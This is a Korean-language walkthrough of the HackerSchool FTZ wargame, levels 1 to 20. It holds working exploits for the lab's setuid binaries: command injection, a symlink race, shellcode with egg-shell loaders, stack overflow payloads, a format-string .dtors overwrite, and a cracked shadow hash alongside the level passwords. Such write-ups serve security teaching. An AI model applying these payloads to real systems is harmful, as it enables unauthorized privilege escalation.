HackerSchool WarGame 풀이 Written by StolenByte http://stolenbyte.egloos.com - 1 -
Level 1. Trivial [level1@ftz level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. [level1@ftz level1]$ find / -user level2 2>/dev/null find / 최상위폴더부터찾겠다. -user level2 소유자가 level2인파일을 -2>dev/null 접근할수없는파일에접근하려고해도에러를띄우지않게하는옵션 [level1@ftz level1]$ find / -user level2 2>/dev/null /bin/excuteme 레벨 2 의권한으로당신이원하는명령어를 한가지실행시켜드리겠습니다. ( 단, my-pass 와 chmod 는제외 ) 어떤명령을실행시키겠습니까? [level2@ftz level2]$ /bin/bash [level2@ftz level2]$ my-pass Level2 Password is "hacker or cracker". - 2 -
Level 2. Trivial [level2@ftz level2]$ cat hint 텍스트파일편집중쉘의명령을실행시킬수있다는데... [level2@ftz level2]$ find / -user level3 2>/dev/null /usr/bin/editor [level2@ftz level2]$ /usr/bin/editor... ~ ~ ~ ~ :!/bin/bash [level3@ftz level2]$ id uid=3003(level3) gid=3002(level2) groups=3002(level2) [level3@ftz level2]$ my-pass Level3 Password is "can you fly?". - 3 -
Level 3. Trivial [level3@ftz level3]$ cat hint 다음코드는 autodig 의소스이다. #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char **argv) char cmd[100]; if( argc!=2 ) printf( "Auto Digger Version 0.9\n" ); printf( "Usage : %s host\n", argv[0] ); exit(0); strcpy( cmd, "dig @" ); strcat( cmd, argv[1] ); strcat( cmd, " version.bind chaos txt"); system( cmd ); 이를이용하여 level4 의권한을얻어라 more hints. - 동시에여러명령어를사용하려면? - 문자열형태로명령어를전달하려면? -------------------------------------------------------------------- - 동시에여러명령어를사용하려면? ; - 문자열형태로명령어를전달하려면? - 4 -
[level3@ftz level3]$ find / -user level4 2>/dev/null /bin/autodig strcat( cmd, argv[1] ); 취약점 [level3@ftz level3]$ /bin/autodig ";bash;bash" dig: Couldn't find server '': Name or service not known [level4@ftz level3]$ id uid=3004(level4) gid=3003(level3) groups=3003(level3) [level4@ftz level3]$ my-pass Level4 Password is "suck my brain". - 5 -
Level 4. Trivial [level4@ftz level4]$ cat hint 누군가 /etc/xient.d/ 에백도어를심어놓았다.! [level4@ftz tmp]$ ls /etc/xinetd.d backdoor cups-lpd echo ntalk rsh services telnet chargen daytime echo-udp rexec rsync sgi_fam time chargen-udp daytime-udp finger rlogin servers talk time-udp [level4@ftz tmp]$ cat /etc/xinetd.d/backdoor service finger disable = no flags = REUSE socket_type = stream wait = no user = level5 server = /home/level4/tmp/backdoor log_on_failure += USERID [level4@ftz level4]$ cat tmp/backdoor #!/bin/bash my-pass [level4@ftz level4]$ finger @localhost Level5 Password is "what is your name?". 설명 : backdoor는 /home/level4/tmp/backdoor로데몬형태의 finger로실행권한은 level5로하기때문에 /home/level4/tmp/backdoor를잘만들면 level5의패스워드를획득할수있다. 간단한다들그럿듯쉘스크립트로짜여있었다. ( 이미해당폴더에는해당파일이존재..) 그래서 finger 서비스를실행시켰다. 로컬에서확인하면될것같아서, @localhost 로실행시켰다. ( 현재는포트가닫혀있다네요.) - 6 -
Level 5. Race Condition [level5@ftz level5]$ cat hint /usr/bin/level5 프로그램은 /tmp 디렉토리에 level5.tmp 라는이름의임시파일을생성한다. 이를이용하여 level6 의권한을얻어라 출제자의의도는 Race Condition 이였으나, 안타깝게도프로그램의취약점이있다. [level5@ftz tmp]$ cd /tmp [level5@ftz tmp]$ cat > level5.tmp [level5@ftz tmp]$ /usr/bin/level5 [level5@ftz tmp]$ cat level5.tmp next password : what the hell :: Race Condition 으로풀기 :: [level5@ftz tmp]$ cat main.c #include <stdio.h> int main() while(1) system("/usr/bin/level5"); return 0; [level5@ftz tmp]$ cat exploit.c #include <stdio.h> int main() int i; for(i=0;i<1000;i++) system("ln -s /home/level5/tmp/pass /tmp/level5.tmp"); system("rm level5.tmp"); - 7 -
return 0; [level5@ftz tmp]$ cat pass next password : what the hell - 8 -
Level 6. Trivial login as: level6 level6@ftz.hackerschool.org's password: hint - 인포샵 bbs 의텔넷접속메뉴에서많이사용되던해킹방법이다. <ctrl>+z [level6@ftz level6]$ ls hint password public_html tmp tn [level6@ftz level6]$ cat password Level7 password is "come together". - 9 -
Level 7. Trivial [level7@ftz level7]$ cat hint /bin/level7 명령을실행하면, 패스워드입력을요청한다. 1. 패스워드는가까운곳에.. 2. 상상력을총동원하라. 3. 2진수를 10진수를바꿀수있는가? 4. 계산기설정을공학용으로바꾸어라. [level7@ftz level7]$ find / -user level8 2>/dev/null /bin/level7 [level7@ftz level7]$ /bin/level7 Insert The Password : a 올바르지않은패스워드입니다. 패스워드는가까운곳에... --_--_- -- - ---_- -- -_- --_--_- -- - ---_- -- -_- 1101101 6D m 1100001 61 a 1110100 74 t 1100101 65 e [level7@ftz level7]$ /bin/level7 Insert The Password : mate Congratulation! next password is "break the world". - 10 -
Level 8. Trivial [level8@ftz level8]$ cat hint level9 의 shadow 파일이서버어딘가에숨어있다. 그파일에대해알려진것은용량이 1481 이라는것뿐이다. [level8@ftz level8]$ find / -group level8 2>/dev/null... /etc/rc.d/found.txt /home/level8 /home/level8/tmp /home/level8/public_html /home/level8/public_html/index.html /home/level8/hint [level8@ftz level8]$ cat /etc/rc.d/found.txt level9:$1$vky6sslg$6ryuxtnmevgsfy7xf0wps.:11040:0:99999:7:-1:-1:134549524 C:\run>john-386 shadow Loaded 1 password hash (FreeBSD MD5 [32/32]) apple (level9) guesses: 1 time: 0:00:00:00 100% (2) c/s: 5253 trying: apple - 11 -
Level 9. Buffer Overflow [level9@ftz level9]$ cat hint 다음은 /usr/bin/bof 의소스이다. #include <stdio.h> #include <stdlib.h> #include <unistd.h> main() char buf2[10]; char buf[10]; printf("it can be overflow : "); fgets(buf,40,stdin); if ( strncmp(buf2, "go", 2) == 0 ) printf("good Skill!\n"); setreuid( 3010, 3010 ); system("/bin/bash"); 이를이용하여 level10 의권한을얻어라. [level9@ftz level9]$ /usr/bin/bof It can be overflow : 0123456789012345go Good Skill! [level10@ftz level9]$ id uid=3010(level10) gid=3009(level9) groups=3009(level9) [level10@ftz level9]$ my-pass Level10 Password is "interesting to hack!". - 12 -
Level 10. Programming [level10@ftz level10]$ cat hint 두명의사용자가대화방을이용하여비밀스런대화를나누고있다. 그대화방은공유메모리를이용하여만들어졌으며, key_t의값은 7530, 대화를나눌때사용하는변수명은 text라고한다. 이를이용해두사람의대화를도청하여 hall의권한을얻어라 설명 : 간단한공유메모리프로그래밍할줄알면쉽게풀수있는문제 [level10@ftz tmp]$ cat exploit.c #include<stdio.h> #include<sys/types.h> #include<sys/shm.h> int main() void *address; address = shmat(shmget(7530, 0, IPC_CREAT), 0, 0); printf("%s", address); return 0; [level10@ftz tmp]$ gcc -o exploit exploit.c [level10@ftz tmp]$./exploit 멍멍 : level11의패스워드는? 구타 : what!@#$? - 13 -
Level 11. Buffer Overflow [level11@ftz level11]$ cat hint #include <stdio.h> #include <stdlib.h> int main( int argc, char *argv[] ) char str[256]; setreuid( 3092, 3092 ); strcpy( str, argv[1] ); printf( str ); [level11@ftz tmp]$./egg Using address: 0xbffffab8 [level11@ftz tmp]$./env 0xbffff2ca [level11@ftz level11]$./attackme $RET sh-2.05b$ id uid=3092(level12) gid=3091(level11) groups=3091(level11) sh-2.05b$ my-pass TERM environment variable not set. Level12 Password is "it is like this". - 14 -
Level 12. Buffer Overflow [level12@ftz level12]$ cat hint #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main( void ) char str[256]; setreuid( 3093, 3093 ); printf( " 문장을입력하세요.\n" ); gets( str ); printf( "%s\n", str ); [level12@ftz level12]$ (python -c 'print "A"*256, "\xaa\xf1\xff\xbf"';cat)./attackme 문장을입력하세요. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ªñÿ... [level12@ftz level12]$ (python -c 'print "A"*267, "\xaa\xf1\xff\xbf"';cat)./attackme 문장을입력하세요. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA ªñÿ id uid=3093(level13) gid=3092(level12) groups=3092(level12) my-pass TERM environment variable not set. Level13 Password is "have no clue". - 15 -
Level 13. Buffer Overflow [level13@ftz level13]$ cat hint #include <stdlib.h> main(int argc, char *argv[]) long i=0x1234567; char buf[1024]; setreuid( 3094, 3094 ); if(argc > 1) strcpy(buf,argv[1]); if(i!= 0x1234567) printf(" Warnning: Buffer Overflow!!! \n"); kill(0,11); 설명 : if 조건이참조하는 buf 의주소만 0x1234567 로바꿔주고 ret 의주소는 egg shell 의주 소로바꾸면된다. #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" "\x00\xc9\xc3\x90/bin/sh"; unsigned long get_esp(void) asm ("movl %esp,%eax"); - 16 -
void main(int argc, char *argv[]) char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=default_offset, bsize=default_buffer_size; int i, eggsize=default_egg_size; char temp[4]; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) printf("can't allocate memory.\n"); exit(0); if (!(egg = malloc(eggsize))) printf("can't allocate memory.\n"); exit(0); addr = get_esp() - offset; printf("using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) if(1040 < I) *(addr_ptr++) = addr; else *(addr_ptr++) = 0x1234567; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"egg=",4); - 17 -
putenv(egg); memcpy(buff,"ret=",4); putenv(buff); sprintf(temp, "%p", getenv("ret")); system("/bin/bash"); [level13@ftz tmp]$./egg 1100 Using address: 0xbffffa98 [level13@ftz tmp]$ /home/level13/attackme $RET sh-2.05b$ id uid=3094(level14) gid=3093(level13) groups=3093(level13) sh-2.05b$ my-pass Level13 Password is "what that nigga want?". - 18 -
Level 14. Buffer Overflow [level14@ftz level14]$ cat hint 레벨14 이후로는 mainsource의문제를그대로가져왔습니다. 버퍼오버플로우, 프맷스트링을학습하는데는이문제들이최고의효과를가져다줍니다. #include <stdio.h> #include <unistd.h> main() int crap; int check; char buf[20]; fgets(buf,45,stdin); if (check==0xdeadbeef) setreuid(3095,3095); system("/bin/sh"); id[level14@ftz level14]$ (python -c 'print "\xef\xbe\xad\xde"*50';cat)./attackme uid=3095(level15) gid=3094(level14) groups=3094(level14) my-pass Level15 Password is "guess what". - 19 -
Level 15. Buffer Overflow [level15@ftz level15]$ cat hint #include <stdio.h> main() int crap; int *check; char buf[20]; fgets(buf,45,stdin); if (*check==0xdeadbeef) setreuid(3096,3096); system("/bin/sh"); [level15@ftz level15]$ gdb -q./attackme (gdb) b main Breakpoint 1 at 0x8048496 (gdb) r Starting program: /home/level15/attackme Breakpoint 1, 0x08048496 in main () (gdb) ni... (gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb 0x080484aa in main () (gdb) info reg eax 0xbffff110-1073745648... (gdb) x/11x $eax 0xbffff110: 0x61616161 0x61616161 0x61616161 0x61616161 0xbffff120: 0x61616161 0x61616161 0x61616161 0x61616161 0xbffff130: 0x61616161 0x61616161 0x62626262 0x080484aa in main () (gdb) ni 0x080484ad in main () (gdb) - 20 -
0x080484b0 in main () (gdb) info reg eax 0x62626262 1650614882 (python -c 'print "\xef\xbe\xad\xde"*10 + "\x10\xf1\xff\xbf"';cat)./attackme id uid=3096(level16) gid=3095(level15) groups=3095(level15) my-pass Level16 Password is "about to cause mass". - 21 -
Level 16. Buffer Overflow [level16@ftz level16]$ cat hint #include <stdio.h> void shell() setreuid(3097,3097); system("/bin/sh"); void printit() printf("hello there!\n"); main() int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); call(); [level16@ftz level16]$ gdb -q./attackme (gdb) b main Breakpoint 1 at 0x804851e (gdb) r Starting program: /home/level16/attackme Breakpoint 1, 0x0804851e in main () (gdb) ni... (gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb... (gdb) ni 0x0804853c in main () (gdb) disass main Dump of assembler code for function main: 0x08048518 <main+0>: push %ebp 0x08048519 <main+1>: mov %esp,%ebp 0x0804851b <main+3>: sub $0x38,%esp - 22 -
0x0804851e <main+6>: movl $0x8048500,0xfffffff0(%ebp) 0x08048525 <main+13>: sub $0x4,%esp 0x08048528 <main+16>: pushl 0x80496e8 0x0804852e <main+22>: push $0x30 0x08048530 <main+24>: lea 0xffffffc8(%ebp),%eax 0x08048533 <main+27>: push %eax 0x08048534 <main+28>: call 0x8048384 <fgets> 0x08048539 <main+33>: add $0x10,%esp 0x0804853c <main+36>: mov 0xfffffff0(%ebp),%eax 0x0804853f <main+39>: call *%eax 0x08048541 <main+41>: leave 0x08048542 <main+42>: ret... (gdb) ni 0x0804853f in main () (gdb) info reg eax 0x62626262 1650614882... (gdb) disass shell Dump of assembler code for function shell: 0x080484d0 <shell+0>: push %ebp 0x080484d1 <shell+1>: mov %esp,%ebp 0x080484d3 <shell+3>: sub $0x8,%esp 0x080484d6 <shell+6>: sub $0x8,%esp 0x080484d9 <shell+9>: push $0xc19 0x080484de <shell+14>: push $0xc19 0x080484e3 <shell+19>: call 0x80483b4 <setreuid> 0x080484e8 <shell+24>: add $0x10,%esp 0x080484eb <shell+27>: sub $0xc,%esp 0x080484ee <shell+30>: push $0x80485b8 0x080484f3 <shell+35>: call 0x8048364 <system> 0x080484f8 <shell+40>: add $0x10,%esp 0x080484fb <shell+43>: leave 0x080484fc <shell+44>: ret 0x080484fd <shell+45>: lea 0x0(%esi),%esi [level16@ftz level16]$ (python -c 'print "A"*40 + "\xd0\x84\x04\x08"';cat)./attackme id uid=3097(level17) gid=3096(level16) groups=3096(level16) my-pass Level17 Password is "king poetic". - 23 -
Level 17. Buffer Overflow [level17@ftz level17]$ cat hint #include <stdio.h> void printit() printf("hello there!\n"); main() int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); setreuid(3098,3098); call(); [level17@ftz level17]$ gdb -q./attackme (gdb) b main Breakpoint 1 at 0x80484ae (gdb) r Starting program: /home/level17/attackme Breakpoint 1, 0x080484ae in main ()... 0x080484c3 in main () (gdb) disass main Dump of assembler code for function main: 0x080484a8 <main+0>: push %ebp 0x080484a9 <main+1>: mov %esp,%ebp 0x080484ab <main+3>: sub $0x38,%esp 0x080484ae <main+6>: movl $0x8048490,0xfffffff0(%ebp) 0x080484b5 <main+13>: sub $0x4,%esp 0x080484b8 <main+16>: pushl 0x804967c 0x080484be <main+22>: push $0x30 0x080484c0 <main+24>: lea 0xffffffc8(%ebp),%eax 0x080484c3 <main+27>: push %eax 0x080484c4 <main+28>: call 0x8048350 <fgets> 0x080484c9 <main+33>: add $0x10,%esp 0x080484cc <main+36>: sub $0x8,%esp - 24 -
0x080484cf <main+39>: push $0xc1a 0x080484d4 <main+44>: push $0xc1a 0x080484d9 <main+49>: call 0x8048380 <setreuid> 0x080484de <main+54>: add $0x10,%esp 0x080484e1 <main+57>: mov 0xfffffff0(%ebp),%eax 0x080484e4 <main+60>: call *%eax... (gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb 0x080484c9 in main ()... 0x080484e4 in main () (gdb) info reg eax 0x62626262 1650614882... [level17@ftz level17]$ (python -c 'print "A"*40 + "\xb8\xfa\xff\xbf"';cat)./attackme id uid=3098(level18) gid=3097(level17) groups=3097(level17) my-pass TERM environment variable not set. Level18 Password is "why did you do it". - 25 -
Level 18. Buffer Overflow [level18@ftz level18]$ cat hint #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> void shellout(void); int main() char string[100]; int check; int x = 0; int count = 0; fd_set fds; printf("enter your command: "); fflush(stdout); while(1) if(count >= 100) printf("what are you trying to do?\n"); if(check == 0xdeadbeef) shellout(); else FD_ZERO(&fds); FD_SET(STDIN_FILENO,&fds); if(select(fd_setsize, &fds, NULL, NULL, NULL) >= 1) if(fd_isset(fileno(stdin),&fds)) read(fileno(stdin),&x,1); switch(x) case '\r': case '\n': printf("\a"); break; case 0x08: count--; - 26 -
printf("\b \b"); break; default: string[count] = x; count++; break; void shellout(void) setreuid(3099,3099); execl("/bin/sh","sh",null); ------------------- char string[100]; ------------------- check = 4byte; ------------------- x = 0; ------------------- count = 0; ------------------- string[-4] == check; [level18@ftz level18]$ (python -c 'print "\x08"*4 + "\xef\xbe\xad\xde"';cat)./attackme Enter your command: id uid=3099(level19) gid=3098(level18) groups=3098(level18) my-pass Level19 Password is "swimming in pink". - 27 -
Level 19. Buffer Overflow [level19@ftz level19]$ cat hint main() char buf[20]; gets(buf); printf("%s\n",buf); 설명 : setreuid(getuid(), getuid()); 를사용하게되면정상적으로권한획득이불가능하다. 그래서강제로 level20 의 id 값 (3100) 을넣어줘야한다. 80483d3: 31 c0 xor %eax,%eax 80483d5: b0 1c mov $0x1c,%al 80483d7: b4 0c mov $0xc,%ah 80483d9: 89 c3 mov %eax,%ebx 80483db: 89 d9 mov %ebx,%ecx 80483dd: 31 c0 xor %eax,%eax 80483df: b0 46 mov $0x46,%al 80483e1: cd 80 int $0x80 setreuid(3100, 3100) [level19@ftz tmp]$ vi egg2.c #include <stdio.h> #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\x1c\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80" // setreuid(3100, 3100); "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; [level19@ftz level19]$ cd /tmp - 28 -
[level19@ftz tmp]$./egg2 400 Using address: 0xbffffab8 [level19@ftz tmp]$ (python -c 'print "\xb8\xfa\xff\xbf"*12';cat) /home/level19/attackme úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ id uid=3100(level20) gid=3099(level19) groups=3099(level19) my-pass TERM environment variable not set. Level20 Password is "we are just regular guys". - 29 -
Level 20. Format String Bug [level20@ftz level20]$ cat hint #include <stdio.h> main(int argc,char **argv) char bleh[80]; setreuid(3101,3101); fgets(bleh,79,stdin); printf(bleh); [level20@ftz level20]$./attackme AAAA%x%x%x%x AAAA4f401524604009850041414141 [level20@ftz level20]$ objdump -h attackme grep.dtors 18.dtors 00000008 08049594 08049594 00000594 2**2 [level20@ftz level20]$ cd /tmp [level20@ftz tmp]$./egg 400 Using address: 0xbffffab8 [level20@ftz tmp]$./env 0xbffff33a [level20@ftz tmp]$ (python -c 'print "AAAA\x98\x95\x04\x08AAAA\x9A\x95\x04\x08%8x%8x%8x%62226c%n%52421c%n"';c at) /home/level20/attackme id uid=3101(clear) gid=3100(level20) groups=3100(level20) my-pass TERM environment variable not set. clear Password is "i will come in a minute". 웹에등록하세요. * 해커스쿨의모든레벨을통과하신것을축하드립니다. 당신의끈질긴열정과능숙한솜씨에찬사를보냅니다. 해커스쿨에서는실력있는분들을모아연구소라는그룹을운영하고있습니다. 이메시지를보시는분들중에연구소에관심있으신분은자유로운양식의가입신청서를 admin@hackerschool.org로보내주시기바랍니다. - 30 -